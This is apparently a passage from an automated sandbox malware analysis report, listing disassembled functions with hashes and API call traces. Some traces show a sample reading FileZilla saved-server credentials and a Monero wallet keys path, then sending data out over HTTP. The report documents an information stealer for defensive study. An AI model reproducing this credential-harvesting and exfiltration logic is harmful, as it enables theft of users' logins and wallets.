                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ;0z{
                          • API String ID: 0-805469412
                          • Opcode ID: c038d0fa1706c44c6133cb9f54996847385439cc93bb59a0dddfa1538cc8f8a6
                          • Instruction ID: f5f95aa0bb922498151c741f10b9996056c6ef8c785321c6a0a149bb5a8b11db
                          • Opcode Fuzzy Hash: c038d0fa1706c44c6133cb9f54996847385439cc93bb59a0dddfa1538cc8f8a6
                          • Instruction Fuzzy Hash: 5C215BF351C100AFE308D979DC91737B2EADB98364F2A0A2EF286D7350D57158019267
                          Function 00F85DAF Relevance: .2, Instructions: 227COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 14f4766ece39803c4f52a9a7c645e44411505e5b23e6630a926477185e3ca8c6
                          • Instruction ID: 5e1a536470cb566871d3c7db80486c76d8a366d6a285bea7f505b7a03a83f7db
                          • Opcode Fuzzy Hash: 14f4766ece39803c4f52a9a7c645e44411505e5b23e6630a926477185e3ca8c6
                          • Instruction Fuzzy Hash: 1D614AF3A086009BE3046A19EC457BBBBE6DFD4720F1A853DEAC4C7784E53998018697
                          Function 00E6B760 Relevance: .2, Instructions: 203COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f88dd3ca165b9869b029033fd762a0eebf79d98d5d5a22abd105b0ae939be179
                          • Instruction ID: 31ab12491422f193e0abbcb6d8ba9a7ebea4c7c4cb18204d2eb01ee6e6ecaec1
                          • Opcode Fuzzy Hash: f88dd3ca165b9869b029033fd762a0eebf79d98d5d5a22abd105b0ae939be179
                          • Instruction Fuzzy Hash: C5510BF3A086109FF3046E19EC817BAB7E5EF94324F1A453DEAC497780EA395C0586D6
                          Function 00EFD1EE Relevance: .2, Instructions: 195COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7f296bf77830bc0fb0eced49d6973df277a3b577183eda82c979a79a4bc7e160
                          • Instruction ID: dae8be47328b0472a988d95f679c1cb9fdcffb84e7b1cad435a63cdd98a5dde5
                          • Opcode Fuzzy Hash: 7f296bf77830bc0fb0eced49d6973df277a3b577183eda82c979a79a4bc7e160
                          • Instruction Fuzzy Hash: 8C51D3F3A092005FF3049D39DC8576AB7E6EBD4320F2B863DD6C8C7784E97998058692
                          Function 00F216B9 Relevance: .2, Instructions: 187COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 24425b44df29d9c66456e57b87017b0531e0cce72f8bb2a291b1690732896239
                          • Instruction ID: e3afc0fea4d70cc68e6ad1d94416dba3f08ad635f2d71a193ccbcdbf09b4a220
                          • Opcode Fuzzy Hash: 24425b44df29d9c66456e57b87017b0531e0cce72f8bb2a291b1690732896239
                          • Instruction Fuzzy Hash: 7C51D5F3A086149BE3147E19EC857BAFBE5DB94360F17463DDBC883780E93A48058786
                          Function 00F25B03 Relevance: .2, Instructions: 184COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0d29bb1afcac6ae05dfe6a964c25afada4bb008d8dd0499a65ff8d635755f248
                          • Instruction ID: ad2aa718f65b358a559f4224308e587f114117a7578839244e11fdee773551b0
                          • Opcode Fuzzy Hash: 0d29bb1afcac6ae05dfe6a964c25afada4bb008d8dd0499a65ff8d635755f248
                          • Instruction Fuzzy Hash: 475168F3B483085BF3486969EC9A7BBB7CAD784324F2A853DDA81D3780FD7998014185
                          Function 00F1572F Relevance: .2, Instructions: 172COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 95c25a7c84c27516308ad7b380c2a91ea59849d67db001ee25331b5825bfbda5
                          • Instruction ID: 1170313ef81b51943ed6dfcb56be278320e5a6e1727fe115d1107043e179f7cc
                          • Opcode Fuzzy Hash: 95c25a7c84c27516308ad7b380c2a91ea59849d67db001ee25331b5825bfbda5
                          • Instruction Fuzzy Hash: 67514DF3E082148FE3009E2DDC8176AB6D6DFD4321F1AC63DD5C493788E97959188682
                          Function 00C09750 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                          Function 00C00250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C08DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C08E0B
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C0A7E6
                            • Part of subcall function 00BF99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BF99EC
                            • Part of subcall function 00BF99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BF9A11
                            • Part of subcall function 00BF99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BF9A31
                            • Part of subcall function 00BF99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BF148F,00000000), ref: 00BF9A5A
                            • Part of subcall function 00BF99C0: LocalFree.KERNEL32(00BF148F), ref: 00BF9A90
                            • Part of subcall function 00BF99C0: CloseHandle.KERNEL32(000000FF), ref: 00BF9A9A
                            • Part of subcall function 00C08E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C08E52
                          • GetProcessHeap.KERNEL32(00000000,000F423F,00C10DBA,00C10DB7,00C10DB6,00C10DB3), ref: 00C00362
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00C00369
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00C00385
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C10DB2), ref: 00C00393
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 00C003CF
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C10DB2), ref: 00C003DD
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00C00419
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C10DB2), ref: 00C00427
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00C00463
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C10DB2), ref: 00C00475
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C10DB2), ref: 00C00502
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C10DB2), ref: 00C0051A
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C10DB2), ref: 00C00532
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C10DB2), ref: 00C0054A
                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00C00562
                          • lstrcat.KERNEL32(?,profile: null), ref: 00C00571
                          • lstrcat.KERNEL32(?,url: ), ref: 00C00580
                          • lstrcat.KERNEL32(?,00000000), ref: 00C00593
                          • lstrcat.KERNEL32(?,00C11678), ref: 00C005A2
                          • lstrcat.KERNEL32(?,00000000), ref: 00C005B5
                          • lstrcat.KERNEL32(?,00C1167C), ref: 00C005C4
                          • lstrcat.KERNEL32(?,login: ), ref: 00C005D3
                          • lstrcat.KERNEL32(?,00000000), ref: 00C005E6
                          • lstrcat.KERNEL32(?,00C11688), ref: 00C005F5
                          • lstrcat.KERNEL32(?,password: ), ref: 00C00604
                          • lstrcat.KERNEL32(?,00000000), ref: 00C00617
                          • lstrcat.KERNEL32(?,00C11698), ref: 00C00626
                          • lstrcat.KERNEL32(?,00C1169C), ref: 00C00635
                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C10DB2), ref: 00C0068E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 1942843190-555421843
                          • Opcode ID: 5abc9262000b05a5dd66a2612ce592531e0e797a4c3783de84374b7b508f9aac
                          • Instruction ID: 415e68665f01092bcc748b80a9e63a5049b398be078ac4cdc764a28f67815741
                          • Opcode Fuzzy Hash: 5abc9262000b05a5dd66a2612ce592531e0e797a4c3783de84374b7b508f9aac
                          • Instruction Fuzzy Hash: 3CD100719002089FDB04EBF4DD9AEEE7778EF54300F548528F602B60D1DE75AA4AEB61
                          Function 00BF5960 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 495networkstringmemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C0A7E6
                            • Part of subcall function 00BF47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BF4839
                            • Part of subcall function 00BF47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BF4849
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00BF59F8
                          • StrCmpCA.SHLWAPI(?,006EE4D0), ref: 00BF5A13
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BF5B93
                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,006EE440,00000000,?,006E9D28,00000000,?,00C11A1C), ref: 00BF5E71
                          • lstrlen.KERNEL32(00000000), ref: 00BF5E82
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00BF5E93
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00BF5E9A
                          • lstrlen.KERNEL32(00000000), ref: 00BF5EAF
                          • lstrlen.KERNEL32(00000000), ref: 00BF5ED8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00BF5EF1
                          • lstrlen.KERNEL32(00000000,?,?), ref: 00BF5F1B
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00BF5F2F
                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00BF5F4C
                          • InternetCloseHandle.WININET(00000000), ref: 00BF5FB0
                          • InternetCloseHandle.WININET(00000000), ref: 00BF5FBD
                          • HttpOpenRequestA.WININET(00000000,006EE5B0,?,006EDC58,00000000,00000000,00400100,00000000), ref: 00BF5BF8
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                          • InternetCloseHandle.WININET(00000000), ref: 00BF5FC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                          • String ID: "$"$------$------$------$@n
                          • API String ID: 874700897-1388741518
                          • Opcode ID: bbad246a503ac77b5da5f408dc24bb3011377b0ae24b4089afc47dc4309101f5
                          • Instruction ID: cbb66e4f46c1699d9a380d7a9c7a58dc9f4df7e4af8ce8d3f56971f5048c02ac
                          • Opcode Fuzzy Hash: bbad246a503ac77b5da5f408dc24bb3011377b0ae24b4089afc47dc4309101f5
